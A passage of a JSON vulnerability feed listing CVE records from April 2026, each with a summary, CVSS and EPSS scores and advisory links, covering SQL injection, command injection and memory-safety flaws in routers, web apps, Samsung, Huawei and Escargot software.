used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00077,"ranking_epss":0.22868,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhuchan770/vulnerability/blob/main/A7000R/setWiFiEasyGuestCfg/ToToLink%20A7000R%20setWiFiEasyGuestCfg%20338996b67c9780b89829d0ea70058788.md","https://vuldb.com/submit/797193","https://vuldb.com/vuln/357056","https://vuldb.com/vuln/357056/cti","https://www.totolink.net/"],"published_time":"2026-04-13T07:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34866","summary":"Out-of-bounds write vulnerability in the WEB module.Impact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":5.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.1,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00412,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3830","summary":"The Product Filter for WooCommerce by WBW WordPress plugin before 3.1.3 does not sanitize and escape a parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.00064,"ranking_epss":0.1989,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://wpscan.com/vulnerability/768014fd-0403-4182-b19e-3d46c92d8755/"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40436","summary":"The ZTE ZXEDM iEMS product has a password reset vulnerability for any user.Because the management of the cloud EMS portal does not properly control access to the user list acquisition function, attackers can read all user list information through the user list interface. Attackers can reset the passwords of obtained user information, causing risks such as unauthorized operations.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11518,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.zte.com.cn/zte-iccp-isupport-webui/support/bulletin/security?lang=en_US&t=0.7465962531829456"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5085","summary":"Solstice::Session versions through 1440 for Perl generates session ids insecurely.\n\nThe _generateSessionID method returns an MD5 digest seeded by the epoch time, a random hash reference, a call to the built-in rand() function and the process id.\n\nThe same method is used in the _generateID method in Solstice::Subsession, which is part of the same distribution.\n\nThe epoch time may be guessed, if it is not leaked in the HTTP Date header. Stringified hash refences will contain predictable content. The built-in rand() function is seeded by 16-bits and is unsuitable for security purposes. The process id comes from a small set of numbers.\n\nPredictable session ids could allow an attacker to gain access to systems.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08581,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://metacpan.org/dist/Solstice/source/lib/Solstice/Session.pm#L481","https://metacpan.org/dist/Solstice/source/lib/Solstice/Subsession.pm#L105","https://security.metacpan.org/docs/guides/random-data-for-security.html","http://www.openwall.com/lists/oss-security/2026/04/13/2"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5936","summary":"An attacker can control a server-side HTTP request by supplying a crafted URL, causing the server to initiate requests to arbitrary destinations. This behavior may be exploited to probe internal network services, access otherwise unreachable endpoints (e.g., cloud metadata services), or bypass network access controls, potentially leading to sensitive information disclosure and further compromise of the internal environment.","cvss":8.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07905,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.foxit.com/support/security-bulletins.html"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6166","summary":"A security vulnerability has been detected in code-projects Vehicle Showroom Management System 1.0. This issue affects some unknown processing of the file /util/UpdateVehicleFunction.php. The manipulation of the argument VEHICLE_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/wfcht-sy/src/issues/2","https://vuldb.com/submit/797097","https://vuldb.com/vuln/357054","https://vuldb.com/vuln/357054/cti"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34865","summary":"Out-of-bounds write vulnerability in the WEB module.Impact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":10.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":10.0,"epss":0.0002,"ranking_epss":0.05266,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T07:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-15441","summary":"The Form Maker by 10Web  WordPress plugin before 1.15.38 does not properly prepare SQL queries when the \"MySQL Mapping\" feature is in use, which could make SQL Injection attacks possible in certain contexts.","cvss":6.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":null,"epss":0.00035,"ranking_epss":0.10303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://wpscan.com/vulnerability/41f69b0a-4d17-4a6b-b803-ea1c370e3cc0/"],"published_time":"2026-04-13T07:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6164","summary":"A security flaw has been discovered in code-projects Lost and Found Thing Management 1.0. This affects an unknown part of the file /addcat.php. Performing a manipulation of the argument cata results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/lanPwa/CVE/issues/1","https://vuldb.com/submit/797089","https://vuldb.com/vuln/357052","https://vuldb.com/vuln/357052/cti"],"published_time":"2026-04-13T06:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6165","summary":"A weakness has been identified in code-projects Vehicle Showroom Management System 1.0. This vulnerability affects unknown code of the file /util/Login_check.php. Executing a manipulation of the argument ID can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/realnotjoking/cve/issues/2","https://vuldb.com/submit/797090","https://vuldb.com/vuln/357053","https://vuldb.com/vuln/357053/cti"],"published_time":"2026-04-13T06:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21013","summary":"Incorrect default permission in Galaxy Wearable prior to version 2.2.68.26 allows local attackers to access sensitive information.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00014,"ranking_epss":0.0248,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21014","summary":"Improper access control in Samsung Camera prior to version 16.5.00.28 allows local attacker to access location data. User interaction is required for triggering this vulnerability.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":0.00013,"ranking_epss":0.02107,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40447","summary":"Integer overflow or wraparound vulnerability in Samsung Open Source Escargot allows undefined behavior.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":5.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.1,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02086,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6163","summary":"A vulnerability was identified in code-projects Lost and Found Thing Management 1.0. Affected by this issue is some unknown functionality of the file /catageory.php. Such manipulation of the argument cat leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/lanPwa/CVE/issues/2","https://vuldb.com/submit/797088","https://vuldb.com/vuln/357051","https://vuldb.com/vuln/357051/cti"],"published_time":"2026-04-13T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21006","summary":"Improper access control in Samsung DeX prior to SMR Apr-2026 Release 1 allows physical attackers to access to hidden notification contents.","cvss":4.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":2.4,"cvss_v4":4.7,"epss":0.0002,"ranking_epss":0.05337,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21007","summary":"Improper check for exceptional conditions in Device Care prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Knox Guard.","cvss":4.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":4.4,"epss":0.00022,"ranking_epss":0.05899,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21008","summary":"Exposure of sensitive information in S Share prior to SMR Apr-2026 Release 1 allows adjacent attacker to access sensitive information.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":5.1,"epss":0.00014,"ranking_epss":0.02433,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21009","summary":"Improper check for exceptional conditions in Recents prior to SMR Apr-2026 Release 1 allows physical attacker to bypass App Pinning.","cvss":4.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.1,"epss":0.00022,"ranking_epss":0.05829,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21010","summary":"Improper input validation in Retail Mode prior to SMR Apr-2026 Release 1 allows local attackers to trigger privileged functions.","cvss":6.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.6,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05164,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21011","summary":"Incorrect privilege assignment in Bluetooth in Maintenance mode prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Extend Unlock.","cvss":5.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":5.4,"epss":0.00021,"ranking_epss":0.05721,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21012","summary":"External control of file name in AODManager prior to SMR Apr-2026 Release 1 allows privileged local attacker to create file with system privilege.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":3.3,"cvss_v4":6.8,"epss":0.00014,"ranking_epss":0.02307,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-6158","summary":"A flaw has been found in Totolink N300RH 6.1c.1353_B20190305. Affected is the function setUpgradeUboot of the file upgrade.so. This manipulation of the argument FileName causes os command injection. The attack is possible to be carried out remotely. The exploit has been published and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.02365,"ranking_epss":0.84948,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/xyh4ck/iot_poc/tree/main/TOTOLINK/N300RHv4/02_setUpgradeUboot_RCE","https://vuldb.com/submit/796426","https://vuldb.com/vuln/357038","https://vuldb.com/vuln/357038/cti","https://www.totolink.net/"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6159","summary":"A vulnerability has been found in code-projects Simple ChatBox up to 1.0. Affected by this vulnerability is an unknown functionality of the file /chatbox/insert.php of the component Endpoint. Such manipulation of the argument msg leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/Stored%20Cross-Site%20Scripting%20(XSS)%20in%20Simple%20Chatbox%20PHP%20msg%20Parameter.md","https://vuldb.com/submit/796666","https://vuldb.com/vuln/357039","https://vuldb.com/vuln/357039/cti"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6160","summary":"A vulnerability was found in code-projects Simple ChatBox 1.0. Affected by this issue is the function SimpleChatbox_PHP of the file chatbox.sql of the component Endpoint. Performing a manipulation results in file and directory information exposure. It is possible to initiate the attack remotely. The exploit has been made public and could be used.","cvss":5.5,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":5.3,"cvss_v4":5.5,"epss":0.00031,"ranking_epss":0.0876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/Sensitive%20Information%20Disclosure%20in%20Simple%20Chatbox%20PHP%20Exposed%20Database%20Backup.md","https://vuldb.com/submit/796696","https://vuldb.com/vuln/357040","https://vuldb.com/vuln/357040/cti"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6161","summary":"A vulnerability was determined in code-projects Simple ChatBox up to 1.0. This affects an unknown part of the file /chatbox/insert.php of the component Endpoint. Executing a manipulation of the argument msg can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/SQL%20Injection%20in%20Simple%20Chatbox%20PHP%20msg%20Parameter.md","https://vuldb.com/submit/796697","https://vuldb.com/vuln/357041","https://vuldb.com/vuln/357041/cti"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6162","summary":"A vulnerability has been found in PHPGurukul Company Visitor Management System 2.0. This impacts an unknown function of the file /bwdates-reports-details.php. The manipulation of the argument fromdate leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00031,"ranking_epss":0.08675,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/f1rstb100d/CVE/issues/44","https://phpgurukul.com/","https://vuldb.com/submit/797171","https://vuldb.com/vuln/357048","https://vuldb.com/vuln/357048/cti"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34862","summary":"Race condition vulnerability in the power consumption statistics module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.00241,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34863","summary":"Out-of-bounds write vulnerability in the file system.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00328,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34864","summary":"Boundary-unlimited vulnerability in the application read module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":6.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00396,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35553","summary":"Bluetooth ACPI Drivers provided by Dynabook Inc. contain a stack-based buffer overflow vulnerability. An attacker may execute arbitrary code by modifying certain registry values.","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":8.4,"epss":0.00012,"ranking_epss":0.01665,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://corporate.jp.sharp/info/product-security/advisory-list/2026-001/","https://global.sharp/corporate/info/product-security/advisory-list/2026-001/","https://jvn.jp/en/vu/JVNVU96334293/"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40446","summary":"Access of resource using incompatible type ('type confusion') vulnerability in Samsung Open Source Escargot allows Pointer Manipulation.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":6.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.9,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01846,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34849","summary":"UAF vulnerability in the screen management module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":2.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.5,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00326,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":"huawei","product":"harmonyos","version":null},{"cve_id":"CVE-2026-34854","summary":"UAF vulnerability in the kernel module.\nImpact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00328,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34855","summary":"Out-of-bounds write vulnerability in the kernel module.\nImpact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":8e-05,"ranking_epss":0.00783,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34857","summary":"UAF vulnerability in the communication module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":4.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.7,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.0022,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinvision/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34858","summary":"UAF vulnerability in the communication module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.0022,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinvision/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34859","summary":"UAF vulnerability in the kernel module.\nImpact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":5.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00369,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinvision/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34861","summary":"Race condition vulnerability in the thermal management module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.00241,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21003","summary":"Improper input validation in data related to network restrictions prior to SMR Apr-2026 Release 1 allows physical attackers to bypass the restrictions.","cvss":5.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.2,"epss":0.00044,"ranking_epss":0.13271,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25205","summary":"Heap-based buffer overflow vulnerability in Samsung Open Source Escargot allows out-of-bounds write.This issue affects Escargot:commit hash \n97e8115ab1110bc502b4b5e4a0c689a71520d335\n\n.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02102,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25206","summary":"Out-of-bounds read vulnerability in Samsung Open Source Escargot allows Resource Leak Exposure.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02102,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25207","summary":"Out-of-bounds write vulnerability in Samsung Open Source Escargot allows Overflow Buffers.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02102,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25208","summary":"Integer overflow vulnerability in Samsung Open Source Escargot allows Overflow Buffers.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00043,"ranking_epss":0.12876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25209","summary":"Out-of-bounds read vulnerability in Samsung Open Source Escargot allows Resource Leak Exposure.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12511,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6157","summary":"A vulnerability was detected in Totolink A800R 4.1.2cu.5137_B20200730. This impacts the function setAppEasyWizardConfig in the library /lib/cste_modules/app.so. The manipulation of the argument apcliSsid results in buffer overflow. The attack can be executed remotely. The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00077,"ranking_epss":0.22868,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/xyh4ck/iot_poc/blob/main/TOTOLINK/A800R/01_Buffer_Overflow_setAppEasyWizardConfig.md","https://vuldb.com/submit/793114","https://vuldb.com/vuln/357037","https://vuldb.com/vuln/357037/cti","https://www.totolink.net/"],"published_time":"2026-04-13T04:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6155","summary":"A weakness has been identified in Totolink A7100RU 7.4cu.2313. The impacted element is the function setWanCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument pppoeServiceName can lead to os command injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_196/README.md","https://vuldb.com/submit/793679","https://vuldb.com/vuln/357035","https://vuldb.com/vuln/357035/cti","https://www.totolink.net/"],"published_time":"2026-04-13T04:16:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6156","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setIpQosRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument Comment leads to os command injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_197/README.md","https://vuldb.com/submit/793681","https://vuldb.com/vuln/357036","https://vuldb.com/vuln/357036/cti","https://www.totolink.net/"],"published_time":"2026-04-13T04:16:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6154","summary":"A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument wizard results in os command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_194/README.md","https://vuldb.com/submit/792990","https://vuldb.com/vuln/357034","https://vuldb.com/vuln/357034/cti","https://www.totolink.net/"],"published_time":"2026-04-13T04:16:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34867","summary":"Double free vulnerability in the multi-mode input system.\nImpact: Successful exploitation of this vulnerability may affect 